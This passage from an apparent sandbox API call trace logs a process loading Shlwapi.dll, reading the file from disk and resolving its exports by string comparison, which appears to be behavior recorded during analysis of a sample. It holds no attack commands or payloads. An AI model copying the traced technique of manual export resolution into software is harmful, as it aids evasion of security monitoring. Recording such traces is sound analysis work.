lpString2="DsAddressToSiteNamesExW") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0150.818] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0150.819] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0150.820] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0150.820] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0150.821] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0150.826] GetProcessHeap () returned 0x520000 [0150.826] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2d65030 | out: hHeap=0x520000) returned 1 [0150.827] GetProcessHeap () returned 0x520000 [0150.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x539a00 [0150.827] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0150.827] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0150.827] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0150.827] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0150.828] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0150.828] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0150.828] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0150.828] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0150.828] GetProcessHeap () returned 0x520000 [0150.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x51148) returned 0x2d65030 [0150.828] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0150.828] ReadFile (in: hFile=0x17c, lpBuffer=0x2d65030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d65030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0150.832] CloseHandle (hObject=0x17c) returned 1 [0150.832] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0150.832] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0150.832] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0150.832] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0150.832] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0150.832] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0150.832] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0150.832] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0150.832] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0150.832] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0150.833] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0150.833] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0150.833] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0150.833] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0150.833] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0150.833] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0150.834] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0150.834] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0150.834] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0150.834] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0150.834] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0150.834] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0150.834] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0150.834] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0150.834] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0150.834] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0150.834] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0150.834] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0150.834] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0150.834] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0150.834] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0150.834] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0150.834] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0150.834] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0150.834] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0150.834] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0150.834] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0150.834] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0150.834] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0150.834] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0150.835] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0150.835] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0150.835] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0150.835] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0150.835] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0150.835] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0150.835] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0150.835] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0150.835] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0150.835] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0150.835] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0150.835] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0150.835] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0150.835] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0150.835] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0150.835] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0150.835] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0150.835] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0150.835] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0150.835] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0150.835] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0150.836] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0150.836] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0150.836] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0150.836] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0150.836] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0150.836] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0150.836] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0150.836] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0150.836] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0150.836] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0150.836] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0150.836] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0150.836] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0150.836] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0150.836] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0150.836] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0150.836] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0150.836] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0150.836] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0150.836] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0150.836] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0150.836] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0150.836] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0150.836] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0150.836] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0150.836] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0150.837] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0150.837] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0150.837] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0150.837] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0150.837] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0150.837] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0150.837] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0150.837] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0150.837] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0150.837] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0150.837] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0150.837] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0150.837] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0150.837] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0150.837] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0150.837] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0150.837] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0150.837] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0150.837] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0150.837] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0150.837] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0150.837] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0150.837] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0150.837] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0150.837] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0150.838] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0150.838] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0150.838] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0150.838] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0150.838] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0150.838] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0150.838] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0150.838] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0150.838] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0150.838] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0150.838] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0150.838] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0150.838] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0150.839] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0150.839] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0150.839] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0150.839] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0150.839] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0150.839] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0150.839] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0150.839] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0150.839] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0150.839] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0150.840] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0150.840] lstrcmpA (lpString1="GetAcceptLanguagesA", 